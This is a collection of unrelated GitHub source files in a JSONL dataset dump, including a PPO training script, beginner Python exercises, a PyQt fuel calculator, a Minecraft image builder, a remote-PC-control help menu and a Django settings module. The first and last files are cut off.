str(config[\"CRITIC\"][\"include_hero\"]) == \"True\"\n\n # Check if everything is legal\n assert computer_vision in {\"None\", \"gt\",\n \"trained\"}, \"'computer_vision' must be equal to 'None','gt'(ground truth) or 'trained',\" \\\n \" found '{}'\".format(computer_vision)\n assert computer_vision != \"gt\" and computer_vision != \"trained\", \"Not implemented yet lol\"\n\n total_time_steps = 0\n if resume_episode > 0:\n actor_ckpt = Path(log_dir) / ('actor-%d.th' % (resume_episode))\n critic_ckpt = Path(log_dir) / ('critic-%d.th' % (resume_episode))\n action_std = torch.load(Path(log_dir) / \"action_std{}\".format(resume_episode))\n total_time_steps = torch.load(Path(log_dir) / \"time_steps{}\".format(resume_episode))\n resume_episode += 1\n\n # INITIALIZING\n path = Path(log_dir)\n path.mkdir(parents=True, exist_ok=resume_episode > 0)\n\n replay_buffer = PPOReplayBuffer()\n reward_params = {'alpha': alpha, 'beta': beta, 'phi': phi, 'delta': delta}\n\n # Setup actor networks\n actor_net = setup_image_model(backbone=actor_backbone, image_ckpt=actor_ckpt, device=device,\n imagenet_pretrained=actor_imagenet_pretrained, all_branch=True)\n actor_net_old = setup_image_model(backbone=actor_backbone, image_ckpt=actor_ckpt, device=device,\n imagenet_pretrained=actor_imagenet_pretrained)\n # Setup agent\n image_agent_kwargs = {\n 'camera_args': {'w': 384, 'h': 160, 'fov': 90, 'world_y': 1.4, 'fixed_offset': 4.0}}\n\n image_agent = PPOImageAgent(model=actor_net, policy_old=actor_net_old, action_std=action_std,\n min_action_std=min_action_std, action_std_decay_rate=action_std_decay_rate,\n action_std_decay_frequency=action_std_decay_frequency,\n ** image_agent_kwargs)\n\n # TODO: Store Agent args\n\n # Setup critic network and criterion\n critic_net = BirdViewCritic3(backbone=critic_backbone, device=device, all_branch=True, input_channel=8).to(device)\n if critic_ckpt:\n critic_net.load_state_dict(torch.load(critic_ckpt))\n critic_criterion = nn.MSELoss()\n\n # Setup optimizers\n optimizer = torch.optim.Adam([{'params': actor_net.parameters(), 'lr': actor_lr},\n {'params': critic_net.parameters(), 'lr': critic_lr}])\n\n # Setup writers for tensorboard\n critic_writer = SummaryWriter(path / \"logs/critic\")\n reward_writer = SummaryWriter(path / \"logs/reward\")\n\n \"\"\"\n ======================\n MAIN PPO LOOP \n ======================\n \"\"\"\n for episode in range(resume_episode, max_episode):\n episode_rewards = 0\n rewards, total_time_steps = rollout(replay_buffer, image_agent, critic_net, episode, total_time_steps,\n max_rollout_length,\n rollouts_per_episode=rollouts_per_episode, port=port, show=show,\n include_hero=include_hero, writer=reward_writer,\n **reward_params)\n\n torch.save(total_time_steps, path / \"time_steps{}\".format(episode))\n torch.save(image_agent.action_std, path / \"action_std{}\".format(episode))\n print(\"Total time steps: {}\".format(total_time_steps))\n\n episode_rewards += rewards\n reward_writer.add_scalar(\"Average rollout rewards\", episode_rewards / rollouts_per_episode, episode)\n update(log_dir, replay_buffer, image_agent, optimizer, device, episode, critic_net, critic_criterion,\n epoch_per_episode, gamma=gamma, lmbda=lmbda, clip_ratio=clip_ratio, batch_size=batch_size,\n num_workers=num_workers, c1=c1, c2=c2, critic_writer=critic_writer)\n replay_buffer.clear_buffer()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jostl/masters-thesis","sub_path":"training/ppo.py","file_name":"ppo.py","file_ext":"py","file_size_in_byte":16279,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"30011304402","text":"number = int(input())\n\na = number // 100\nb = (number % 100) // 10\nc = number % 10\n\nn = a + b\nm = a + c\nfor _ in range(n):\n for _ in range(m):\n if number % 5 == 0:\n number -= a\n elif number % 3 == 0:\n number -= b\n else:\n number += c\n print(number, end=\" \")\n print()\n","repo_name":"yavor-gornalov/softuni_python_book","sub_path":"07_complex_loops_exam_problems/digits.py","file_name":"digits.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74697544891","text":"# Algoritmo de Fibonacci\n# Este algoritmo gera a sequência de Fibonacci até um determinado número.\n\n\ndef fibonacci(n):\n sequencia = [0, 1]\n\n while sequencia[-1] < n:\n proximo = sequencia[-1] + sequencia[-2]\n sequencia.append(proximo)\n\n return sequencia\n\n\n# Exemplo de uso:\nlimite = 100\nsequencia_fibonacci = fibonacci(limite)\nprint(sequencia_fibonacci)\n","repo_name":"Wxskley/Python","sub_path":"ChatGPT/Dia 11/Exercícios Difíceis/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43544772411","text":"# Explanation on all requests from the server\nall_actions_type_help = [\n {\n \"name\": \"connect\",\n \"description\": \"Connect the user\",\n \"format\": \"connect: <user-name> <password>\",\n \"example\": \"connect: myUserName 123123\",\n \"notes\": \"user must to be register\",\n \"alternative\": \"login\"\n },\n {\n \"name\": \"login\",\n \"description\": \"Login the user\",\n \"format\": \"login: <user-name> <password>\",\n \"example\": \"login: myUserName 123123\",\n \"notes\": \"user must to be register\",\n \"alternative\": \"connect\"\n },\n {\n \"name\": \"register\",\n \"description\": \"Register user\",\n \"format\": \"register: <user-name> <password>\",\n \"example\": \"register: myUserName 123123\",\n \"notes\": None,\n \"alternative\": \"signup\"\n },\n {\n \"name\": \"signup\",\n \"description\": \"Signup user\",\n \"format\": \"signup: <user-name> <password>\",\n \"example\": \"signup: myUserName 123123\",\n \"notes\": None,\n \"alternative\": \"register\"\n },\n {\n \"name\": \"time\",\n \"description\": \"Get current time\",\n \"format\": \"time\",\n \"example\": \"time\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": \"name\",\n \"description\": \"Get the name of the computer\",\n \"format\": \"name\",\n \"example\": \"name\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": \"exit\",\n \"description\": \"Exit from the connections\",\n \"format\": \"exit\",\n \"example\": \"exit\",\n \"notes\": \"It will close the program\",\n \"alternative\": None\n },\n {\n \"name\": \"screenshot\",\n \"description\": \"Take screenshot of the server screen and save it in the server name folder in the client\",\n \"format\": \"screenshot\",\n \"example\": \"screenshot\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": \"run program\",\n \"description\": \"Run program by path\",\n \"format\": \"run program: <program path>\",\n \"example\": \"run program: C:\\\\Program.exe\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": \"get folder\",\n \"description\": \"Get Folder content (files and folder) in the server\",\n \"format\": \"get folder: <path>\",\n \"example\": \"get folder: C:\\\\\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": \"file content\",\n \"description\": \"Get File content in the server\",\n \"format\": \"file content: <file url>\",\n \"example\": \"file content: C:\\\\demo.txt\",\n \"notes\": \"user must be logged in\",\n \"alternative\": None\n },\n {\n \"name\": \"stop keep alive\",\n \"description\": \"Stop keep alive messages\",\n \"format\": \"stop keep alive\",\n \"example\": \"stop keep alive\",\n \"notes\": \"The Server connection will expire after 10 seconds\",\n \"alternative\": \"stop heartbeat\"\n },\n {\n \"name\": \"stop heartbeat\",\n \"description\": \"Stop heartbeat messages\",\n \"format\": \"stop heartbeat\",\n \"example\": \"stop heartbeat\",\n \"notes\": \"The Server connection will expire after 10 seconds\",\n \"alternative\": \"stop keep alive\"\n },\n]\n\n\ndef get_complete_help_message():\n \"\"\"\n Generate complete help message\n :return: complete help message on all the actions\n \"\"\"\n print_str = '--------------------'\n\n for action in all_actions_type_help:\n print_str += '\\n{}:\\n\\t' \\\n 'Description: {}\\n\\t' \\\n 'Format: {}\\n\\t' \\\n 'Example: {}' \\\n .format(action['name'],\n action['description'],\n action['format'],\n action['example'])\n\n if action['notes'] is not None:\n print_str += '\\n\\tNotes: {}'.format(action['notes'])\n\n if action['alternative'] is not None:\n print_str += '\\n\\tAlternative: {}'.format(action['alternative'])\n\n print_str += '\\n'\n\n return print_str\n\n\ncomplete_help_message = get_complete_help_message()\n\n\n# User Action Type\nclass UserActionType:\n\n def __init__(self, handler):\n self.handler = handler\n\n # User Action Types\n self.UserActionTypes = {\n \"name\": self.handler.server_name_handler,\n \"exit\": self.handler.exit_handler,\n \"screenshot\": self.handler.screenshot_handler,\n \"stop keep alive\": self.handler.stop_heartbeat,\n \"stop heartbeat\": self.handler.stop_heartbeat,\n }\n\n # Get Function based on action type, if no command then None\n def get_action_fn(self, command):\n if command not in self.UserActionTypes:\n return {}\n return {\n 'fn': self.UserActionTypes[command]\n }\n","repo_name":"rluvaton/small-pc-control","sub_path":"client/userActionType.py","file_name":"userActionType.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2667548679","text":"from PyQt5.QtWidgets import *\r\nfrom PyQt5.QtCore import *\r\nclass YakitHesaplayici(QDialog):\r\n def __init__(self, ebeveyn=None, parent=None):\r\n super(YakitHesaplayici,self).__init__(parent)\r\n\r\n grid=QGridLayout()\r\n\r\n # birinci satır kodu\r\n grid.addWidget(QLabel(\"gidilen yol\"),0,0)\r\n self.gidilenyol=QLineEdit()\r\n self.gidilenyol.setInputMask(\"00000\")\r\n grid.addWidget(self.gidilenyol,0,1)\r\n\r\n\r\n # ikinci satır kodu\r\n grid.addWidget(QLabel(\"yakıtın litre fiyatı\"),1,0)\r\n self.yakitfiyati=QLineEdit()\r\n self.yakitfiyati.setInputMask(\"0.0\")\r\n grid.addWidget(self.yakitfiyati,1,1)\r\n\r\n #üçüncü satır kodu\r\n grid.addWidget(QLabel(\"100 km de tüketilen yakıt\"),2,0)\r\n self.tuketilen = QLineEdit()\r\n self.tuketilen.setInputMask(\"00.0\")\r\n grid.addWidget(self.tuketilen,2,1)\r\n\r\n #dördüncü satır\r\n grid.addWidget(QLabel(\"toplam tutar:\"),3,0)\r\n self.toplamtutar=QLabel(\"\")\r\n grid.addWidget(self.toplamtutar,3,1)\r\n\r\n #beşinci satır\r\n hesapla=QPushButton(\"hesapla\")\r\n hesapla.clicked.connect(self.hesap)\r\n grid.addWidget(hesapla,4,0,1,2)\r\n\r\n self.setLayout(grid)\r\n self.setWindowTitle(\"Yakıt Hesaplayıcısı\")\r\n\r\n def hesap(self):\r\n yol=int(self.gidilenyol.text())\r\n fiyat=float(self.yakitfiyati.text())\r\n tuketim=float(self.tuketilen.text())\r\n sonuc=fiyat*(yol*tuketim)/100\r\n self.toplamtutar.setText(\"<font color='blue'>%0.2f</font>\"%sonuc)\r\n\r\n\r\n\r\n\r\n\r\n\r\napp=QApplication([])\r\npencere=YakitHesaplayici()\r\npencere.show()\r\napp.exec()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"emree35e35/Simple-python-projects","sub_path":"Yakıt hesaplama.py","file_name":"Yakıt hesaplama.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13928787011","text":"from functools import reduce\n\n\ndef list2int(a: list) -> int:\n return reduce(lambda x, y: x*10+y, a)\n\n\ndef int2list(a: int) -> list:\n a = list(str(a))\n return map(lambda x: int(x), a)\n\n\ndef format_black_holes(black_hole_numbers: list) -> tuple:\n black_hole_number_groups = []\n while len(black_hole_numbers) > 0:\n current_group = []\n current_number = black_hole_numbers[0]\n while current_number in black_hole_numbers:\n current_group.append(current_number)\n black_hole_numbers.remove(current_number)\n minimum = list2int(sorted(int2list(current_number)))\n maximum = list2int(sorted(int2list(current_number), reverse=True))\n current_number = maximum - minimum\n black_hole_number_groups.append(tuple(current_group))\n return tuple(black_hole_number_groups)\n","repo_name":"Ninzero/BlackHoleNumber","sub_path":"CommonFunction.py","file_name":"CommonFunction.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27980569601","text":"class Solution(object):\n def merge(self, nums1, m, nums2, n):\n res = []\n cur1, cur2 = 0, 0\n for i in range(m+n):\n if cur1 == m:\n self.append_rest(cur2, nums2, res, n)\n break\n if cur2 == n:\n self.append_rest(cur1, nums1, res, m)\n break\n if nums1[cur1] <= nums2[cur2]:\n res.append(nums1[cur1])\n cur1 += 1\n else:\n res.append(nums2[cur2])\n cur2 += 1\n return res\n\n def append_rest(self,cur, nums, res, bound):\n for j in range(cur, bound):\n res.append(nums[j])\n\nif __name__ == '__main__':\n s = Solution()\n print(s.merge([1,2,3,0,0,0],3,[2,5,6],3))\n","repo_name":"KShih/workspaceLeetcode","sub_path":"python/88_MergeSortedArray.py","file_name":"88_MergeSortedArray.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17270972127","text":"import torch\nfrom collections import OrderedDict\n#%%\ndef rename_emb_key(filename):\n\n checkpoint = torch.load(filename)\n model_state_dict_new = OrderedDict()\n checkpoint_new = OrderedDict()\n \n for key, value in checkpoint['model_state_dict'].items():\n new_key = key\n if key == \"emb_id.weight\":\n new_key = \"emb.0.weight\" \n if key == \"emb.weight\":\n new_key = \"emb.0.weight\" \n \n model_state_dict_new[new_key] = value\n \n for key, value in checkpoint.items():\n value_new = value\n if key == 'model_state_dict':\n value_new = model_state_dict_new\n \n checkpoint_new[key] = value_new\n \n torch.save(checkpoint_new, filename)\n \ndataset_name = 'uci_traffic'\n\nexperiment_dir = 'experiments/'+dataset_name\nalgorithm = 'transformer_conv'\nseeds = 10\nfor seed in range(seeds):\n filename = f'{experiment_dir}/{algorithm}/{algorithm}_seed={seed}' \n rename_emb_key(filename)","repo_name":"elephaint/pedpf","sub_path":"lib/rename_emb_key.py","file_name":"rename_emb_key.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"26303623734","text":"from mcpi.minecraft import Minecraft\nfrom mcpi import block\nfrom time import sleep\nimport random\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport math\ncolours = [ (255, 255, 255, \"00\"),\n (255, 0, 0, \"14\"),\n (255, 128, 0, \"01\"),\n (0, 255, 0, \"13\"),\n (255,128,255,\"02\"),\n (50,50,255,\"03\"),\n (255,255,0,\"04\"),\n (50,255,50,\"05\"),\n (255,102,178,\"06\"),\n (96,96,96,\"07\"),\n (192,192,192,\"08\"),\n (0,200,200,\"09\"),\n (150,0,150,\"10\"),\n (0,0,255,\"11\"),\n (102,51,0,\"12\"),\n (0,0,0,\"15\")]\n \n\n\ndef nearest_colour( subjects, query ):\n return min(subjects,key = lambda subject:sum((s - q) ** 2 for s,q in zip( subject, query ) ) )\n\n\n#print( nearest_colour( colours, (64, 0, 0) ) ) # dark red\n#print( nearest_colour( colours, (0, 192, 0) ) ) # green\n#print( nearest_colour( colours, (255, 255, 64) ) ) # white\n\ndef init():\n\t#ipString = \"127.0.0.1\"\n\tipString = \"192.168.7.226\"\n\t#mc = Minecraft.create(\"127.0.0.1\", 4711)\n\tmc = Minecraft.create(ipString, 4711)\n\tmc.setting(\"world_immutable\",False)\n\t#x, y, z = mc.player.getPos() \n\treturn mc\ndef open_image(path):\n newImage = Image.open(path)\n return newImage\n\n# Save Image\ndef save_image(image, path):\n image.save(path, 'png')\n\n# Create a new image with the given size\ndef create_image(i, j):\n image = Image.new(\"RGB\", (i, j), \"white\")\n return image\n\n# Get the pixel from the given image\ndef get_pixel(image, i, j):\n # Inside image bounds?\n width, height = image.size\n if i > width or j > height:\n return None\n\n # Get Pixel\n pixel = image.getpixel((i, j))\n return pixel\n \ndef main():\n\tmc = init()\n\tlst=[]\n\t#img=open_image(\"loss.png\")\n\t#img =create_image(10,10)\n\tx,y,z=mc.player.getPos()\n\t\n\t#plt.imshow(img);\n\tselection=input(\"what is the name of your file? must contain the extension: \")\n\timg = Image.open(selection);\n\timg=img.convert('RGB')\n\tpx=img.load()\n\t#plt.show();\n\tfor i in range(0,img.width):\n\t\tfor j in range(0,img.height):\n\t\t\tcoord=(-i,abs(img.height-1-j))\n\t\t\tbloop=(img.getpixel(coord))\n\t\t\tprint(bloop)\n\t\t\twoolcolor=str(nearest_colour(colours, bloop))\n\t\t\t#print(woolcolor)\n\t\t\twoolcolor=(woolcolor[-4:])\n\t\t\twoolcolor=(woolcolor[:2])\n\t\t\tprint(woolcolor)\n\t\t\t#lst.append(woolcolor)\n\t\t\tmc.setBlock(x+5+i,y+j,z,35,int(woolcolor))\n\t\t\t#print(nearest_colour(colours, px[i,j]))\n\t#print(lst)\t\t\n\tprint(img.size)\n\t\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"piluvr/mcpi-piluvr","sub_path":"imageparse.py","file_name":"imageparse.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"74538230970","text":"\"\"\"Constants for use in minesweeper.py\"\"\"\n\n# General options\nFPS = 120\nINIT_SIZE = (500, 500)\nPAD = 2\nFONT_NAME = \"Ubuntu Mono\"\nFONT_MIN_SIZE = 10\nFONT_MAX_SIZE = 30\n\n# Minesweeper config\nNUM_BOXES = 10 # The number of boxes on each side. The total number of boxes is this^2\nMINE_PROBABILITY = .2\n\n# Colours\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nGREY = (169, 169, 169)\nDARK_GREY = (128,128,128)\n","repo_name":"ch0rl/Minesweeper","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43323398864","text":"#author: Tobias Andermann, tobias.andermann@bioenv.gu.se\n\nimport os\nimport sys\nimport re\nimport glob\nimport shutil\nimport argparse\nimport csv\nimport random\n\n\nfrom .utils import CompletePath\n\n\n# Get arguments\ndef get_args():\n\tparser = argparse.ArgumentParser(\n\t\tdescription=\"This script will create consensus sequences from pairs of allele sequences, thereby turning allele alignments into consensus alignments.\",\n\t\tformatter_class=argparse.ArgumentDefaultsHelpFormatter\n\t)\n\tparser.add_argument(\n\t\t'--input',\n\t\trequired=True,\n\t\taction=CompletePath,\n\t\tdefault=None,\n\t\thelp='The directory containing fasta alignments'\n\t)\n\tparser.add_argument(\n\t\t'--config',\n\t\trequired=True,\n\t\thelp='A configuration file containing the full paths to the following programs: samtools, bcftools, vcfutils, emboss, picard. Also the paths to either clc-assembly-cell or bwa, depending on which of these two mapping softwares is chosen (see --mapper)'\n\t)\n\tparser.add_argument(\n\t\t'--output',\n\t\trequired=True,\n\t\taction=CompletePath,\n\t\tdefault=None,\n\t\thelp='The output directory where results will be safed'\n\t)\n\n\treturn parser.parse_args()\n\n\t\n# Get arguments\nargs = get_args()\n# Set working directory\nwork_dir = args.input\nout_dir = args.output\t\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\nconfig = args.config\n\n\t\n\t\n\t\n\t\n#XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n#%%% Functions %%%\n\t\n\t\ndef read_fasta(fasta):\n\tname, seq = None, []\n\tfor line in fasta:\n\t\tline = line.rstrip()\n\t\tif line.startswith(\">\"):\n\t\t\tif name: yield (name, ''.join(seq))\n\t\t\tname, seq = line, []\n\t\telse:\n\t\t\tseq.append(line)\n\tif name: yield (name, ''.join(seq))\n\n\t\t\n\t\t\n#XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n#%%% Workflow %%%\t\n\n# Read in config file\nwith open(config, 'r') as c:\n\tconf_dict = {}\n\treader = csv.reader(c, delimiter='\\t')\n\treader = list(reader)\n\tfor row in reader:\n\t\tconf_dict.setdefault(row[1],[])\n\t\tconf_dict[row[1]].append(row[0])\n\n\n# Create a list of all fasta files\nfasta_files = []\t\nfor fasta in os.listdir(work_dir):\n\tif fasta.endswith(\".fasta\") or fasta.endswith(\".fa\"):\n\t\tfasta_files.append(fasta)\n\n\nfor fasta in fasta_files:\n\n\t# Create an output consensus fasta file for each allele alignment\n\tfasta_cons_name = re.sub(\"allele\",\"consensus\",fasta)\n\tout_fasta = open(os.path.join(out_dir, fasta_cons_name), 'w')\n\t\n\t# Create a dictionary for each fasta file, where both allele sequences are assigned to the same key for each sample\n\tseq_dict = {}\n\tfor seq_pair in list(conf_dict.values()):\n\t\tkey = list(conf_dict.keys())[list(conf_dict.values()).index(seq_pair)]\n\t\t#print seq_pair[0], \"=\", key\n\t\t#print seq_pair[1], \"=\", key\n\t\twith open(\"%s/%s\" %(work_dir,fasta)) as f:\n\t\t\tfor name, seq in read_fasta(f):\n\t\t\t\tname = re.sub('>', '', name)\n\t\t\t\tif name in seq_pair:\n\t\t\t\t\tname = key\n\t\t\t\t\tseq_dict.setdefault(name,[])\n\t\t\t\t\tseq_dict[name].append(seq)\n\t# Create a consensus dict for each fasta file with the correct new header name as key and the consensus sequence of the two alleles as value\n\tconsensus_dict = {}\n\tfor header in seq_dict:\n\t\tconsensus_dict.setdefault(header,[])\n\t\tsequence = seq_dict[header]\n\t\tallele0 = sequence[0]\n\t\tallele1 = sequence[1]\n\t\t# Find those positions where the two alleles differ from each other and make a random pick of one of the versions, simulationg a consensus sequence\n\t\tfor id, base in enumerate(allele0):\n\t\t\tif base != allele1[id]:\n\t\t\t\tvariation = [base,allele1[id]]\n\t\t\t\tbase = random.choice(variation)\n\t\t\tconsensus_dict[header].append(base)\n\t# Write the consensus dictionary into a fasta output file\n\tfor cons_header in consensus_dict:\n\t\tcons_sequence = \"\".join(consensus_dict[cons_header])\n\t\tcons_header = \">%s\" %cons_header\n\t\tout_fasta.write(cons_header+\"\\n\")\n\t\tout_fasta.write(cons_sequence+\"\\n\")\n\t\n\tout_fasta.close()\n\t\t\n\t\t\n\n\t\n","repo_name":"AntonelliLab/seqcap_processor","sub_path":"secapr/create_consensus_from_alleles.py","file_name":"create_consensus_from_alleles.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"78"} +{"seq_id":"36722781775","text":"# https://docs.djangoproject.com/en/3.1/ref/settings/\n\nimport os\nfrom datetime import timedelta\nfrom pathlib import PurePath\nfrom typing import Tuple\n\nfrom django.utils.translation import ugettext_lazy as ugt\n\nfrom celery.schedules import crontab\nfrom decouple import config\nfrom dj_database_url import parse as db_url\n\n\n# Build paths inside the project like this: BASE_DIR.joinpath('some')\n# `pathlib` is better than writing: dirname(dirname(dirname(__file__)))\n# backend/\nBASE_DIR = PurePath(__file__).parent.parent.parent\n\n\ndef base_dir_join(*args):\n return os.path.join(BASE_DIR, *args)\n\n\nSITE_ID = 1\n\nSECURE_HSTS_PRELOAD = True\n\nDEBUG = True\n\nSECRET_KEY = config(\"DJANGO_SECRET_KEY\")\n\nADMINS = ((\"Admin\", \"foo@example.com\"),)\n\nALLOWED_HOSTS = [\"localhost\", \"0.0.0.0\", \"127.0.0.1\"]\n\n# APP CONFIGURATION\n# ------------------------------------------------------------------------------\nDJANGO_APPS: Tuple[str, ...] = (\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n \"django.contrib.admin\",\n)\n\nLOCAL_APPS: Tuple[str, ...] = (\n \"common\",\n \"apps.users\",\n \"apps.meta\",\n \"apps.projects\",\n \"apps.delivery\",\n)\n\nTHIRD_PARTY_APPS: Tuple[str, ...] = (\n \"corsheaders\",\n \"rest_framework\",\n \"rest_framework_simplejwt.token_blacklist\",\n # 'django_extensions',\n)\n# CORS\n# ------------------------------------------------------------------------------\nCORS_ORIGIN_ALLOW_ALL = True\nCORS_ALLOW_CREDENTIALS = True # to accept cookies via ajax request\nCORS_ORIGIN_WHITELIST = [\n # the domain for front-end app(you can add more than 1)\n \"http://localhost:3000\",\n]\nCORS_ALLOWED_ORIGIN_REGEXES = [\n r\"^https://\\w+\\.heroku\\.com$\",\n]\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\nAUTH_USER_MODEL = \"users.User\"\n\nMIDDLEWARE = [\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"corsheaders.middleware.CorsMiddleware\",\n \"django.middleware.locale.LocaleMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\nROOT_URLCONF = \"onlineBenevolent.urls\"\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": [base_dir_join(\"templates\")],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n ],\n },\n },\n]\n\nASGI_APPLICATION = \"onlineBenevolent.asgi.application\"\n\nAUTH_PASSWORD_VALIDATORS = [\n {\"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\",},\n {\"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\",},\n {\"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\",},\n {\"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\",},\n]\n\n# DJANGO REST FRAMEWORK\n# ------------------------------------------------------------------------------\n\nREST_FRAMEWORK = {\n \"DEFAULT_AUTHENTICATION_CLASSES\": (\n \"rest_framework_simplejwt.authentication.JWTAuthentication\",\n ),\n \"DEFAULT_PERMISSION_CLASSES\": (\"rest_framework.permissions.IsAuthenticated\",),\n \"DEFAULT_PAGINATION_CLASS\": \"rest_framework.pagination.PageNumberPagination\",\n \"PAGE_SIZE\": 20,\n}\n\nSIMPLE_JWT_SIGNING_KEY = config(\"SIMPLE_JWT_SIGNING_KEY\", cast=str, default=SECRET_KEY)\n\nSIMPLE_JWT = {\n \"ACCESS_TOKEN_LIFETIME\": timedelta(days=1),\n \"REFRESH_TOKEN_LIFETIME\": timedelta(days=7),\n \"SIGNING_KEY\": SIMPLE_JWT_SIGNING_KEY,\n \"AUTH_HEADER_TYPES\": (\"Bearer\",),\n \"USER_ID_CLAIM\": \"id\",\n \"AUTH_TOKEN_CLASSES\": (\"rest_framework_simplejwt.tokens.AccessToken\",),\n \"TOKEN_TYPE_CLAIM\": \"token_type\",\n}\n\n# Email\nEMAIL_BACKEND = \"django.core.mail.backends.smtp.EmailBackend\"\n\n# Database\n# https://docs.djangoproject.com/en/3.1/ref/settings/#databases\n\nDATABASES = {\n \"default\": config(\"DATABASE_URL\", cast=db_url),\n}\nDATABASES[\"default\"][\"ENGINE\"] = config(\"DATABASE_ENGINE\", cast=str, default=None)\nDATABASES[\"default\"][\"CONN_MAX_AGE\"] = config(\"POSTGRES_CONN_MAX_AGE\", cast=int, default=60)\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.1/topics/i18n/\n\nLANGUAGE_CODE = \"en-us\"\n\nTIME_ZONE = \"UTC\"\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nLANGUAGES = (\n (\"en\", ugt(\"English\")),\n (\"ar\", ugt(\"Arabic\")),\n)\n\nSTATICFILES_DIRS = (base_dir_join(\"static\"),)\n\nINSTALLED_APPS += (\"drf_yasg\",)\n\n# drf_yasg\nSWAGGER_SETTINGS = {\n \"DEFAULT_INFO\": \"onlineBenevolent.urls.api_info\",\n \"REFETCH_SCHEMA_WITH_AUTH\": True,\n \"SECURITY_DEFINITIONS\": {\n \"api_key\": {\"type\": \"apiKey\", \"in\": \"header\", \"name\": \"Authorization\"}\n },\n}\n\n# Celery\nCELERY_ACCEPT_CONTENT = [\"json\", \"msgpack\"]\nCELERY_TASK_SERIALIZER = \"json\"\nCELERY_RESULT_SERIALIZER = \"json\"\nCELERY_ACKS_LATE = True\nCELERY_TIMEZONE = TIME_ZONE\n\n# Celery\nBROKER_HOST = config(\"RABBITMQ_HOST\", default=\"rabbitmq\")\nBROKER_USER = config(\"RABBITMQ_DEFAULT_USER\", default=\"online_benevolent\")\nBROKER_PASSWORD = config(\"RABBITMQ_DEFAULT_PASS\", default=\"online_benevolent\")\nBROKER_VHOST = config(\"RABBITMQ_DEFAULT_VHOST\", default=\"online_benevolent\")\nBROKER_URL = \"amqp://{0}:{1}@{2}:5672\".format(BROKER_USER, BROKER_PASSWORD, BROKER_HOST)\nBROKER_TRANSPORT_OPTIONS = {\n \"max_connections\": 2,\n}\nBROKER_POOL_LIMIT = None\nBROKER_CONNECTION_MAX_RETRIES = None\nCELERY_BROKER_URL = BROKER_URL\nCELERY_SEND_TASK_ERROR_EMAILS = True\n# CELERY_RESULT_BACKEND='djcelery.backends.database:DatabaseBackend',\nCELERY_RESULT_BACKEND = config(\"CELERY_BACKEND\", \"redis://redis:6379/0\")\n\nCELERY_BEAT_SCHEDULE = {\n \"generate_delivery_patch\": {\n 